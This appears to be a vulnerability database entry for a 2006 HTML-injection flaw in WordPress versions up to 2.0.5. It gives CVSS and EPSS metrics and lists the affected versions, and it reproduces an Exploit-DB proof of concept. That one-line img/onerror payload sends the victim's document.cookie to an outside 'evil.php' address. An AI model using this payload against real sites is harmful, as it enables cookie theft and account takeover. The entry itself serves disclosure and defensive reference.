Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
6.8 |
|
AV:N/AC:M/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 29356
Publication date : 2006-12-26 23h00 +00:00
Author : David Kierznowski
EDB Verified : Yes
source: https://www.securityfocus.com/bid/21782/info
Wordpress is prone to an HTML-injection scripting vulnerability because the application fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Versions prior to 2.0.6 are vulnerable to this issue.
< img src='https://wordpress-site/wp/wp-admin/templates.php?file=< img src=%27%27 onerror="javascript: var s=(document.location.toString().charAt(6)); var url=(%27http:%27%2Bs%2Bs%2B%27michaeldaw.org%27); document.location=url%2Bs%2B%27evil.php?%27%2Bdocument.cookie">' >
Products Mentioned
Configuraton 0
Wordpress>>Wordpress >> Version To (including) 2.0.5
Wordpress>>Wordpress >> Version 0.6.2
Wordpress>>Wordpress >> Version 0.6.2.1
Wordpress>>Wordpress >> Version 0.7
Wordpress>>Wordpress >> Version 0.71
Wordpress>>Wordpress >> Version 1.2
Wordpress>>Wordpress >> Version 1.2.1
Wordpress>>Wordpress >> Version 1.2.2
Wordpress>>Wordpress >> Version 1.5
Wordpress>>Wordpress >> Version 1.5.1
Wordpress>>Wordpress >> Version 1.5.1.2
Wordpress>>Wordpress >> Version 1.5.1.3
Wordpress>>Wordpress >> Version 1.5.2
Wordpress>>Wordpress >> Version 2.0
Wordpress>>Wordpress >> Version 2.0.1
Wordpress>>Wordpress >> Version 2.0.2
Wordpress>>Wordpress >> Version 2.0.3
Wordpress>>Wordpress >> Version 2.0.4
References